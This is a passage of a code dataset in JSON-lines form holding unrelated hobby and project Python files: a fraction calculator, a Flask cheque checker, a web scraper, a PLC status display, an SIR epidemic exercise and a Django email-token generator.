').split('/'))\na2, b2 = map(int, input('Введите второе число в формате “a/b” ').split('/'))\nf_one = Fraction(a1, b1)\nf_two = Fraction(a2, b2)\n\n\nprint('Произведение равно ''{}/{}'.format(a1 * a2, b1 * b2))\n\nif b1 == b2:\n print('Сумма равна ''{}/{}'.format(a1+a2, b1))\nelse:\n cd = int(b1*b2/gcd(b1, b2))\n rn = int(cd/b1*a1+cd/b2*a2)\n g2 = gcd(rn, cd)\n a = int(rn/g2)\n b = int(cd/g2)\n print('Сумма равна ''{}/{}'.format(a, b) if a != b else a)\n\n\nprint('Произведение через модуль fractions равно ',f_one * f_two)\nprint('Сумма через модуль fractions равно ', f_one + f_two)\n\n\n ","repo_name":"Marina48Lip/PYTHON_2","sub_path":"dz2_2.py","file_name":"dz2_2.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20653033862","text":"from pyexcel_xlsx import save_data\nfrom collections import OrderedDict\nfrom example.dbModel import *\n\nif __name__ == '__main__':\n db_data = University.query.all()\n first_row = [[\"ID\", \"縣市\", \"學校\"]]\n for index, data in enumerate(db_data, start=1):\n County = data.County\n University = data.University\n first_row.append([index, County, University])\n\n dic = OrderedDict()\n\n dic.update({\"Sheet 1\": first_row})\n save_data(\"Excel-data.xlsx\", dic)\n print('SQL Database TO Excel DONE')\n","repo_name":"twtrubiks/Google-Play-Store-spider-bs4-excel","sub_path":"example/SQL_Database_To_Excel.py","file_name":"SQL_Database_To_Excel.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"26610703148","text":"import pickle\nfrom flask import Flask , render_template , request\n\napp = Flask(__name__)\n\n\n@app.route('/' , methods=['GET'])\ndef hello_world():\n \n return render_template('index.html')\n\n\n # Python3 program to print a given number in words.\n# The program handles till 9 digits numbers and\n# can be easily extended to 20 digit number\n \n# strings at index 0 is not used, it\n# is to make array indexing simple\none = [ \"\", \"one \", \"two \", \"three \", \"four \",\n \"five \", \"six \", \"seven \", \"eight \",\n \"nine \", \"ten \", \"eleven \", \"twelve \",\n \"thirteen \", \"fourteen \", \"fifteen \",\n \"sixteen \", \"seventeen \", \"eighteen \",\n \"nineteen \"];\n \n# strings at index 0 and 1 are not used,\n# they is to make array indexing simple\nten = [ \"\", \"\", \"twenty \", \"thirty \", \"forty \",\n \"fifty \", \"sixty \", \"seventy \", \"eighty \",\n \"ninety \"];\n \n# n is 1- or 2-digit number\ndef numToWords(n, s):\n \n str = \"\";\n \n # if n is more than 19, divide it\n if (n > 19):\n str += ten[n // 10] + one[n % 10];\n else:\n str += one[n];\n # if n is non-zero\n if (n):\n str += s;\n \n return str;\n \n# Function to print a given number in words\ndef convertToWords(n):\n \n # stores word representation of given\n # number n\n out = \"\";\n \n # handles digits at ten millions and\n # hundred millions places (if any)\n out += numToWords((n // 10000000),\n \"crore \");\n \n # handles digits at hundred thousands\n # and one millions places (if any)\n out += numToWords(((n // 100000) % 100),\n \"lakh \");\n \n # handles digits at thousands and tens\n # thousands places (if any)\n out += numToWords(((n // 1000) % 100),\n \"thousand \");\n \n # handles digit at hundreds places (if any)\n out += numToWords(((n // 100) % 10),\n \"hundred \");\n \n if (n > 100 and n % 100):\n out += \"and \";\n \n # handles digits at ones and tens\n # places (if any)\n out += numToWords((n % 100), \"\");\n \n return out;\n \n# Driver code\n \n# long handles upto 9 digit no\n# change to unsigned long long\n# int to handle more digit number\nn = 438237764;\n \n# convert given number in words\nprint(convertToWords(n));\n\n# This code is contributed by mits \n\ndef parse_int(textnum, numwords={}):\n # create our default word-lists\n if not numwords:\n\n # singles\n units = [\n \"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\",\n \"nine\", \"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\",\n ]\n\n # tens\n tens = [\"\", \"\", \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\n\n # larger scales\n scales = [\"hundred\", \"thousand\",\"lakh\", \"core\", \"billion\", \"trillion\"]\n\n # divisors\n numwords[\"and\"] = (1, 0)\n\n # perform our loops and start the swap\n for idx, word in enumerate(units): numwords[word] = (1, idx) \n for idx, word in enumerate(tens): numwords[word] = (1, idx * 10)\n for idx, word in enumerate(scales): numwords[word] = (10 ** ( idx * 2 + 1 or 2), 0)\n\n # primary loop\n current = result = 0\n # loop while splitting to break into individual words\n for word in textnum.replace(\"-\",\" \").split():\n # if problem then fail-safe\n if word not in numwords:\n raise Exception(\"Illegal word: \" + word)\n\n # use the index by the multiplier\n scale, increment = numwords[word]\n current = current * scale + increment\n \n # if larger than 100 then push for a round 2\n if scale > 100:\n result += current\n current = 0\n\n # return the result plus the current\n return result + current \n\n\n\n\nchaine='one thousand twenty thousand'\nchiffre=120000\ndef correction(chaine,chiffre):\n l='lakh'\n t='thousand'\n c='crore'\n l1=0\n t1=0\n c1=0\n mylist=chaine.split(' ')\n for i in range(len(mylist)):\n if mylist[i]=='lakh':\n l1=l1+1\n if mylist[i]=='thousand':\n t1=t1+1\n if mylist[i]=='crore':\n c1=c1+1\n if(l1>1 or t1>1 or h1>1 or c1>1):\n amount=(convertToWords(chiffre))\n print('the check is not valid : the letter amount is incorrect \\n ====> Here is the autocorrection :')\n print('the real amount is : ',amount,chiffre)\n \n \n else:\n if (parse_int(chaine)==chiffre):\n print('the check is valid');\n print('the real amount is :',chiffre,chaine)\n \n else:\n amount=(parse_int(chaine))\n print('the check is not valid : the number amount is incorrect \\n ====> Here is the autocorrection :')\n print('the real amount is : ',chaine,amount)\n \n \n \n return('The check is not valid : the number amount is incorrect ,Here is the autocorrection : the real amount is : ',chaine , str(chiffre))\n\n\n\n@app.route('/',methods=['GET','POST'])\ndef predict():\n imagefile= request.files['imagefile']\n image_path = \"./static/\" + imagefile.filename\n imagefile.save(image_path)\n v=correction(chaine,chiffre)\n return render_template('index.html',prediction=v)\n\n\nif __name__ == '__main__':\n app.run(port=3000, debug=True)","repo_name":"khalfallah-fatma/Template","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42101364120","text":"\ndef solution(brown, yellow):\n for i in range(3,(brown+yellow)//3+1):\n Y = i\n if not (brown+yellow)%Y: # 정수이면\n X = (brown+yellow)//Y # X값을 구한다\n if not yellow%(Y-2): # yellow를 (Y-2)나눈 값이 정수이면\n yellowY = Y-2\n if not (yellow)%yellowY and yellow//yellowY < X: # yellow를 yellowY로 나눴을 때 정수이면\n answer = [X,Y]\n return answer\n\n\nbrown = 10\nbrown = 8\nbrown = 24\nyellow = 2\nyellow = 1\nyellow = 24\nprint(solution(brown,yellow))\nprint(solution(8,1))\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"MakeMoneying/programmers/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8346496306","text":"#! /usr/bin/python3\n\n#Download Light Novel Chapters\n#And write to file (formatted)\n\nimport os\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport urllib.request\nimport requests\nimport sys\n\n#link:\n#https://jingletranslations.wordpress.com/i-favor-the-villainess/\n\n#Setup browser and beautiful soup\ndef setupBrowser():\n global browser\n global url\n browser = webdriver.Chrome(\"/usr/lib/chromium-browser/chromedriver\")\n browser.get(url)\n \ndef setupSoup():\n global browser\n global content\n global soup\n content = browser.page_source\n soup = BeautifulSoup(content, 'html.parser')\n \n#print\ndef printAll():\n global soup\n print(soup.prettify())\n\ndef printContentDiv():\n global soup\n global content\n content = soup.find('div', class_='entry-content').find_all('a')\n #headers = soup.find('div', class_='entry-content').find_all('h4')\n #print chapter title and links\n #NEXT: find chapters by sections then print\n setList()\n \n#Other functions\ndef setList():\n global urlList\n global titleList\n global content\n for link in content:\n url = link.get('href')\n title = link.string\n #print('Title: ',title)\n #print('Link: ',url)\n urlList.append(url)\n titleList.append(title)\n print('URL:', urlList)\n print('TITLE: ',titleList)\n \ndef closeBrowser():\n global browser\n browser.close()\n \n#Main function\ndef main():\n global url\n \n print('from main()')\n while url == '':\n url = input('Enter LN Main Title link: ')\n \n setupBrowser()\n setupSoup()\n \n try:\n printContentDiv()\n except:\n print(sys.exc_info()[0])\n #closeBrowser()\n \n closeBrowser()\n\n#Global Variables\nbrowser = ''\nurl = ''\nsoup = ''\ncontent = ''\nurlList = []\ntitleList = []\n\n#Program\nmain()\n","repo_name":"Tavi66/Web_Scraper","sub_path":"Light_Novel.py","file_name":"Light_Novel.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15114767566","text":"#!/usr/bin/env python3.6.7\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\nAuthor: Patrick\r\n\r\nDate: 2021/6/22 1:09\r\n\r\nDocs: \r\n \r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objs as go\r\nimport dash\r\nimport dash_bootstrap_components as dbc\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nimport plotly.express as px\r\nfrom dash.dependencies import Input, Output, State\r\n\r\nfrom depoverty import layout as dplayout\r\nfrom boxplot import layout as bxlayout\r\n\r\npx.set_mapbox_access_token(\r\n \"pk.eyJ1IjoicGF0cmlja3BybyIsImEiOiJja3E2cWZ5OXAwMHcwMm5zM3NoNTYwcnV5In0.KvBQYukBha-vWqMJp2isqw\")\r\n\r\nexternal_stylesheets = [dbc.themes.BOOTSTRAP]\r\n\r\napp = dash.Dash(external_stylesheets=external_stylesheets, suppress_callback_exceptions=True)\r\n\r\n# the style arguments for the sidebar. We use position:fixed and a fixed width\r\nSIDEBAR_STYLE = {\r\n \"position\": \"fixed\",\r\n \"top\": 0,\r\n \"left\": 0,\r\n \"bottom\": 0,\r\n \"width\": \"18rem\",\r\n \"padding\": \"2rem 2rem\",\r\n \"background-color\": \"#f8f9fa\",\r\n}\r\n\r\n# the styles for the main content position it to the right of the sidebar and add some padding.\r\nCONTENT_STYLE = {\r\n \"margin-left\": \"18rem\",\r\n \"margin-right\": \"2rem\",\r\n \"padding\": \"10rem 10rem\",\r\n}\r\n\r\nsidebar = html.Div(\r\n [\r\n html.H4(\"Poverty\", className=\"display-4\"),\r\n html.Hr(),\r\n dbc.Nav(\r\n [\r\n dbc.NavLink(\"Home\", href=\"/\", active=\"exact\"),\r\n dbc.NavLink(\"Rehabilitate\", href=\"/rehabilitate\", active=\"exact\"),\r\n dbc.NavLink(\"Distribution\", href=\"/distribution\", active=\"exact\"),\r\n ],\r\n vertical=True,\r\n pills=True,\r\n ),\r\n ],\r\n style=SIDEBAR_STYLE,\r\n)\r\n\r\ncontent = html.Div(id=\"page-content\", style=CONTENT_STYLE)\r\n\r\napp.layout = html.Div(\r\n [\r\n dcc.Location(id=\"url\"), sidebar, content,\r\n ]\r\n)\r\n\r\n\r\n@app.callback(\r\n Output(\"page-content\", \"children\"),\r\n [Input(\"url\", \"pathname\")]\r\n)\r\ndef render_page_content(pathname):\r\n if pathname == \"/\":\r\n return\r\n elif pathname == \"/rehabilitate\":\r\n return dplayout\r\n elif pathname == \"/distribution\":\r\n return bxlayout\r\n # If the user tries to reach a different page, return a 404 message\r\n return dbc.Jumbotron(\r\n [\r\n html.H1(\"404: Not found\", className=\"text-danger\"),\r\n html.Hr(),\r\n html.P(f\"The pathname {pathname} was not recognised...\"),\r\n ]\r\n )\r\n\r\n\r\ndf_data = pd.read_csv('data/use.csv')\r\ndf_data['density'] = df_data['a4']*1.0/df_data['a1']\r\n\r\n\r\n@app.callback(\r\n Output(\"box-plot\", \"figure\"),\r\n Input(\"y-axis\", \"value\"))\r\ndef generate_chart(y):\r\n fig = px.box(df_data, x='year', y=y)\r\n fig.update_layout(margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\r\n return fig\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","repo_name":"Patrick-Rud/EDA-Visualization","sub_path":"project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72251695605","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom matplotlib import pyplot as plt\n\n# deklaracja stałych\nN = 1000.0\nI_0 = 1.0\n\na = \"\"\"WYPEŁNIĆ\"\"\" # prawdopodobieństwo wyzdrowienia\nr = \"\"\"WYPEŁNIĆ\"\"\" # prawdopodobieństwo zarażenia się\n\ntimes = 5000\ndt = 0.001\n\n# inicjalizacja zmiennych\nI = [I_0]\nS = [N - I_0]\nT = [0]\n\n# główna pętla\nfor i in range(1, times):\n I.append(\"\"\"WYPEŁNIĆ\"\"\")\n S.append(\"\"\"WYPEŁNIĆ\"\"\")\n T.append(T[i-1] + dt)\n\n# rysowanie wykresu\nsus, = plt.plot(T, S, color='b')\ninf, = plt.plot(T, I, color='r')\nplt.plot([0, times*dt], [a/r, a/r], 'k--')\nplt.legend([sus, inf], [u'zdrowi', u'chorzy'])\nplt.xlabel(u'Czas')\nplt.ylabel(u'Liczba osób')\nplt.show()\n","repo_name":"traducha/epidemics_DOKO2017","sub_path":"workshop/1_sis_sir.py","file_name":"1_sis_sir.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40572481029","text":"# coding=latin-1\n\n\"\"\"\nThe flask application package.\n\"\"\"\n\nfrom flask import Flask\nimport logging\nfrom flask_login import LoginManager\n# from flask.logging import default_handler\n\napp = Flask(__name__)\n\n\n# dictConfig= dict(\n# version = 1,\n# formatters = {\n# 'f': {'format':\n# '%(asctime)s %(name)-12s %(levelname)----8s %(message)s'}\n# },\n# handlers = {\n# 'h': {'class': 'logging.StreamHandler',\n# 'formatter': 'f',\n# 'level': logging.DEBUG}\n# },\n# root = {\n# 'handlers': ['h'],\n# 'level': logging.DEBUG,\n# },\n# )\n\n\n\n# app.logger.removeHandler(default_handler)\n# app.logger.config=dictConfig\n\n\n\nlogging.basicConfig(filename='demo.log', level=logging.DEBUG)\n\n# from logging.config import fileConfig\n# from os import path\n# import os\n\n# log_file_path = path.join(path.dirname(path.abspath(__file__)), 'logging.cfg')\n# path_rslv = path.split(path.dirname(path.abspath(__file__)))[1:] \n# fileName = path.join(*[\"..\" for dotdot in range(len(path_rslv))], \"logging.cfg\")\n# print(log_file_path)\n# print(f\"CWD = {os.getcwd()}\")\n# print(f\"fileName = {fileName}\")\n# fileConfig(\"logging.cfg\")\n\n\n\n# Accesso al DB\n##### app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:mysecretpassword@localhost/votazione'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:mysecretpassword@kubernetes.docker.internal/votazione'\n# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# app.config['TESTING'] = True\n\n#from appconfig import ProductionConfig\n#app.config.from_object(ProductionConfig())\napp.config.from_pyfile('settings.cfg', silent=True)\n\n\n# Configure Login\napp.secret_key = app.config['SECRET_KEY']\nlogin_manager = LoginManager()\n#login_manager.login_view = 'auth.login'\nlogin_manager.init_app(app)\n\napp.logger.debug('Questo è debug')\napp.logger.info('Questo è info')\napp.logger.warning('Questo è warning')\napp.logger.error('Questo è error')\n\n\n\nimport Concorso.views\nfrom .model import User\n\n\n\n\n@login_manager.user_loader\ndef user_loader(user_id):\n \"\"\"Given *user_id*, return the associated User object.\n\n :param unicode user_id: user_id (email) user to retrieve\n\n \"\"\"\n return User.query.get(user_id)","repo_name":"jourus/ConcorsoFotografico","sub_path":"Concorso/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27529878980","text":"import functools\nimport itertools\nfrom string import Template\n\nfrom pydm import Display\nfrom pydm.widgets import PyDMLabel\nfrom pydm.widgets.byte import PyDMBitIndicator\nfrom pydm.widgets.channel import PyDMChannel\nfrom qtpy import QtWidgets\nfrom qtpy.QtGui import QColor\n\nfrom fast_faults import clear_channel\n\n\nclass PLCIOCStatus(Display):\n _on_color = QColor(0, 255, 0)\n _off_color = QColor(100, 100, 100)\n plc_status_ch = None\n\n def __init__(self, parent=None, args=None, macros=None):\n super().__init__(parent=parent, args=args, macros=macros)\n self.config = macros\n self.ffs_count_map = {}\n self.ffs_label_map = {}\n self.setup_ui()\n for ch in (\n self.plc_status_ch,\n self.plc_task1_vis_ch,\n self.plc_task2_vis_ch,\n self.plc_task3_vis_ch,\n ):\n self.destroyed.connect(functools.partial(clear_channel, ch))\n\n def setup_ui(self):\n self.setup_plc_ioc_status()\n\n def setup_plc_ioc_status(self):\n ffs = self.config.get('fastfaults')\n if not ffs:\n return\n if self.plc_ioc_container is None:\n return\n\n grid = self.ui.plc_ioc_container.layout()\n self.task_vis_data = {}\n\n for row, ff in enumerate(ffs):\n prefix = ff.get('prefix')\n ffo_start = ff.get('ffo_start')\n ffo_end = ff.get('ffo_end')\n ff_start = ff.get('ff_start')\n ff_end = ff.get('ff_end')\n\n ffos_zfill = len(str(ffo_end)) + 1\n ffs_zfill = len(str(ff_end)) + 1\n entries = itertools.product(\n range(ffo_start, ffo_end + 1),\n range(ff_start, ff_end + 1)\n )\n\n plc_name = prefix.strip(':')\n plc_macros = dict(P=prefix)\n # get the heartbeat of the IOC to\n ico_heart_ch = Template(\n 'ca://${P}HEARTBEAT').safe_substitute(**plc_macros)\n # the get PLC process cycle count\n plc_task_info_1 = Template(\n 'ca://${P}TaskInfo:1:CycleCount').safe_substitute(**plc_macros)\n plc_task_info_2 = Template(\n 'ca://${P}TaskInfo:2:CycleCount').safe_substitute(**plc_macros)\n plc_task_info_3 = Template(\n 'ca://${P}TaskInfo:3:CycleCount').safe_substitute(**plc_macros)\n\n label_name = QtWidgets.QLabel(str(plc_name))\n label_online = QtWidgets.QLabel()\n label_in_use = QtWidgets.QLabel()\n label_alarmed = QtWidgets.QLabel()\n label_heartbeat = PyDMLabel(init_channel=ico_heart_ch)\n label_plc_task_info_1 = PyDMLabel(init_channel=plc_task_info_1)\n label_plc_task_info_2 = PyDMLabel(init_channel=plc_task_info_2)\n label_plc_task_info_3 = PyDMLabel(init_channel=plc_task_info_3)\n\n # if alarm of plc_task_info_1 == INVALID => plc down\n # if the count does not update and alarm == NO_ALARM =>\n # plc online but stopped\n self.plc_status_ch = PyDMChannel(\n plc_task_info_1,\n severity_slot=functools.partial(\n self.plc_cycle_count_severity_changed, plc_name))\n self.plc_status_ch.connect()\n\n # if we can get the plc_cycle_count the PLC should be ON, if not OFF\n # if we get the plc_cycle_count and the .SERV is INVALID, the PLC is OFF\n plc_status_indicator = PyDMBitIndicator(circle=True)\n plc_status_indicator.setColor(self._off_color)\n # TODO - maybe add the case where PLC On but stopped\n\n # Handle the visibility of task 2 and 3 info\n # Not every PLC has tasks 2 and 3\n # These should be shown if they are valid or if they are nonzero\n # These should be hidden if they are both 0 and invalid while\n # task1 is still valid\n # If task1 is invalid display all 3 (val of task1 irrelevant)\n # I need to collect/cache a value and then show/hide appropriately\n self.task_vis_data[plc_name] = {\n 'task1': {\n 'value': 0,\n 'sevr': 3,\n 'conn': False,\n },\n 'task2': {\n 'value': 0,\n 'sevr': 3,\n 'conn': False,\n },\n 'task3': {\n 'value': 0,\n 'sevr': 3,\n 'conn': False,\n },\n }\n self.plc_task1_vis_ch = PyDMChannel(\n plc_task_info_1,\n severity_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task1',\n value_type='sevr',\n widget=None,\n ),\n )\n self.plc_task1_vis_ch.connect()\n self.plc_task2_vis_ch = PyDMChannel(\n plc_task_info_2,\n value_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task2',\n value_type='value',\n widget=label_plc_task_info_2,\n ),\n severity_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task2',\n value_type='sevr',\n widget=label_plc_task_info_2,\n ),\n connection_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task2',\n value_type='conn',\n widget=label_plc_task_info_2,\n ),\n )\n self.plc_task2_vis_ch.connect()\n self.plc_task3_vis_ch = PyDMChannel(\n plc_task_info_3,\n value_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task3',\n value_type='value',\n widget=label_plc_task_info_3,\n ),\n severity_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task3',\n value_type='sevr',\n widget=label_plc_task_info_3,\n ),\n connection_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task3',\n value_type='conn',\n widget=label_plc_task_info_3,\n ),\n )\n self.plc_task3_vis_ch.connect()\n\n # total initial number of ffs to initialize the dictionaries with\n # num_ffo * num_ff\n all_ffos = ((ffo_end - ffo_start) + 1) * (ff_end - ff_start + 1)\n self.ffs_count_map[plc_name] = {'online': [False]*all_ffos,\n 'in_use': [False]*all_ffos,\n 'alarmed': [False]*all_ffos,\n 'plc_status': False}\n self.ffs_label_map[plc_name] = {'online': label_online,\n 'in_use': label_in_use,\n 'alarmed': label_alarmed,\n 'plc_status': plc_status_indicator}\n\n count = 0\n for _ffo, _ff in entries:\n s_ffo = str(_ffo).zfill(ffos_zfill)\n s_ff = str(_ff).zfill(ffs_zfill)\n ch_macros = dict(index=count, P=prefix, FFO=s_ffo, FF=s_ff)\n\n ch = Template(\n 'ca://${P}FFO:${FFO}:FF:${FF}:Info:InUse_RBV').safe_substitute(**ch_macros)\n channel = PyDMChannel(\n ch,\n connection_slot=functools.partial(\n self.ffo_connection_callback, plc_name, count),\n value_slot=functools.partial(\n self.ffo_value_changed, plc_name, count),\n severity_slot=functools.partial(\n self.ffo_severity_changed, plc_name, count))\n # should not be adding a new connection because this address\n # already exists in the connections,\n # instead should just add a listener\n channel.connect()\n count += 1\n\n # this is the same width as the labels in the plc_ioc_header\n max_width = 150\n min_width = 130\n max_height = 30\n min_height = 30\n widget_list = [label_name, label_online, label_in_use,\n label_alarmed, label_heartbeat,\n label_plc_task_info_1, label_plc_task_info_2,\n label_plc_task_info_3, plc_status_indicator]\n\n self.setup_widget_size(\n max_width=max_width,\n min_width=min_width,\n max_height=max_height,\n min_height=min_height,\n widget_list=widget_list,\n )\n\n grid.addWidget(label_name, row, 0)\n grid.addWidget(label_online, row, 1)\n grid.addWidget(label_in_use, row, 2)\n grid.addWidget(label_alarmed, row, 3)\n grid.addWidget(label_heartbeat, row, 4)\n grid.addWidget(label_plc_task_info_1, row, 5)\n grid.addWidget(label_plc_task_info_2, row, 6)\n grid.addWidget(label_plc_task_info_3, row, 7)\n grid.addWidget(plc_status_indicator, row, 8)\n\n b_vertical_spacer = (\n QtWidgets.QSpacerItem(20, 20,\n QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Expanding))\n grid.addItem(b_vertical_spacer, row + 1, 0)\n self.plc_ioc_container.setSizePolicy(QtWidgets.QSizePolicy.Maximum,\n QtWidgets.QSizePolicy.Preferred)\n\n def setup_widget_size(\n self,\n max_width,\n min_width,\n max_height,\n min_height,\n widget_list,\n ):\n for widget in widget_list:\n widget.setMinimumWidth(min_width)\n widget.setMaximumWidth(max_width)\n widget.setMinimumHeight(min_height)\n widget.setMaximumHeight(max_height)\n\n def plc_cycle_count_severity_changed(self, key, alarm):\n \"\"\"\n Process PLC Cycle Count PV severity change.\n\n This targets only the first cycle counter. When the first\n cycle counter goes \"Invalid\", mark PLC status as bad.\n Otherwise, PLC status is good.\n\n Parameters\n ----------\n key : str\n Prefix of PLC\n alarm : int\n New alarm.\n\n Note\n ----\n alarm == 0 => NO_ALARM, if NO_ALARM and counter does not change,\n PLC is till online but stopped\n alarm == 3 => INVALID - PLC is Offline\n \"\"\"\n plc = self.ffs_count_map.get(key)\n if alarm == 3:\n plc['plc_status'] = False\n else:\n plc['plc_status'] = True\n self.update_status_labels(key)\n\n def update_task_visibility(\n self,\n value,\n plc_name,\n task,\n value_type,\n widget,\n ):\n \"\"\"\n Check if tasks 2 or 3 are valid to be shown.\n\n The goal is that we shouldn't show invalid channels unless\n they are true errors. The conditions for a non-error\n expected \"bad\" state on counts 2 or 3 are:\n\n - Task count 1 is valid\n - Task counts 2 or 3 are 0 and invalid\n\n Task 1 being invalid is always a bad state.\n Task 2 or 3 being nonzero and invalid is also a bad state.\n These usually means the PLC has crashed.\n\n Task 2 or 3 being disconnected is fine- that might just mean\n we've updated to ads-ioc R0.6.0.\n Task 1 being disconnected is always a problem.\n \"\"\"\n plc_data = self.task_vis_data[plc_name]\n task_data = plc_data[task]\n task_data[value_type] = value\n if widget is None:\n return\n if all((\n plc_data['task1']['sevr'] == 0,\n task_data['value'] == 0,\n task_data['sevr'] == 3,\n )):\n widget.hide()\n elif task in ('task2', 'task3') and not task_data['conn']:\n widget.hide()\n else:\n widget.show()\n\n def ffo_connection_callback(self, key, idx, conn):\n # Update ffos count for connected In_Use PVs\n plc = self.ffs_count_map.get(key)\n plc['online'][idx] = conn\n # Call routine to update proper label\n self.update_plc_labels(key)\n\n def ffo_value_changed(self, key, idx, value):\n # Update ffos count for In_Use == True Pvs\n plc = self.ffs_count_map.get(key)\n plc['in_use'][idx] = value\n self.update_plc_labels(key)\n\n def ffo_severity_changed(self, key, idx, alarm):\n # 0 = NO_ALARM, 1 = MINOR, 2 = MAJOR, 3 = INVALID\n plc = self.ffs_count_map.get(key)\n if alarm != 0:\n plc['alarmed'][idx] = True\n else:\n plc['alarmed'][idx] = False\n self.update_plc_labels(key)\n\n def update_plc_labels(self, key):\n # Fetch value from count\n # TODO maybe have some checks here....?\n counts = self.ffs_count_map.get(key)\n online_cnt = sum(counts['online'])\n in_use_cnt = sum(counts['in_use'])\n alarmed_cnt = sum(counts['alarmed'])\n # Pick the label from the map\n # Update label with new count\n labels = self.ffs_label_map.get(key)\n labels['online'].setText(str(online_cnt))\n labels['in_use'].setText(str(in_use_cnt))\n labels['alarmed'].setText(str(alarmed_cnt))\n\n def update_status_labels(self, key):\n status = self.ffs_count_map.get(key)\n plc_status = status['plc_status']\n labels = self.ffs_label_map.get(key)\n if plc_status is True:\n labels['plc_status'].setColor(self._on_color)\n else:\n labels['plc_status'].setColor(self._off_color)\n\n def ui_filename(self):\n return 'plc_ioc_status.ui'\n","repo_name":"pcdshub/pmps-ui","sub_path":"plc_ioc_status.py","file_name":"plc_ioc_status.py","file_ext":"py","file_size_in_byte":14535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4155083561","text":"import functools\nimport logging\nfrom threading import Thread\nfrom typing import Callable\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template import Template, Context\nfrom django.template.loader import render_to_string\nfrom django.urls import get_resolver\nfrom django.utils import timezone\n\nfrom datetime import datetime\n\nimport jwt\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\n\n\nclass EmailVerificationTokenGenerator:\n \"\"\"\n Strategy object used to generate and check tokens for the password\n reset mechanism.\n \"\"\"\n try:\n key_salt = settings.CUSTOM_SALT\n except AttributeError:\n key_salt = \"django-email-verification.token\"\n algorithm = None\n secret = settings.SECRET_KEY\n\n def make_token(self, user, expiry=None):\n \"\"\"\n Return a token that can be used once to do a password reset\n for the given user.\n\n Args:\n user (Model): the user\n expiry (datetime): optional forced expiry date\n\n Returns:\n (tuple): tuple containing:\n token (str): the token\n expiry (datetime): the expiry datetime\n \"\"\"\n exp = (self._now() + settings.EMAIL_TOKEN_LIFE) if expiry is None else int(expiry.timestamp())\n payload = {'email': user.email, 'exp': exp}\n return jwt.encode(payload, self.secret, algorithm='HS256'), datetime.fromtimestamp(exp)\n\n def check_token(self, token):\n \"\"\"\n Check that a password reset token is correct.\n Args:\n token (str): the token from the url\n\n Returns:\n (tuple): tuple containing:\n valid (bool): True if the token is valid\n user (Model): the user model if the token is valid\n \"\"\"\n\n try:\n payload = jwt.decode(token, self.secret, algorithms=['HS256'])\n email, exp = payload['email'], payload['exp']\n \"\"\"\n if hasattr(settings, 'EMAIL_MULTI_USER') and settings.EMAIL_MULTI_USER:\n users = get_user_model().objects.filter(email=email)\n else:\n \"\"\"\n users = [get_user_model().objects.filter(email=email).order_by(\"created_at\").last()]\n except (ValueError, get_user_model().DoesNotExist, jwt.DecodeError, jwt.ExpiredSignatureError):\n return False, None\n\n if not len(users) or users[0] is None:\n return False, None\n\n return True, users[0]\n\n @staticmethod\n def _now():\n return datetime.now().timestamp()\n\n\ndefault_token_generator = EmailVerificationTokenGenerator()\n\nlogger = logging.getLogger('django_email_verification')\nDJANGO_EMAIL_VERIFICATION_MORE_VIEWS_ERROR = 'ERROR: more than one verify view found'\nDJANGO_EMAIL_VERIFICATION_NO_VIEWS_ERROR = 'ERROR: no verify view found'\nDJANGO_EMAIL_VERIFICATION_NO_PARAMETER_WARNING = 'WARNING: found verify view without parameter'\n\n\ndef send_email(user, thread=True, **kwargs):\n try:\n user.save()\n\n expiry_ = 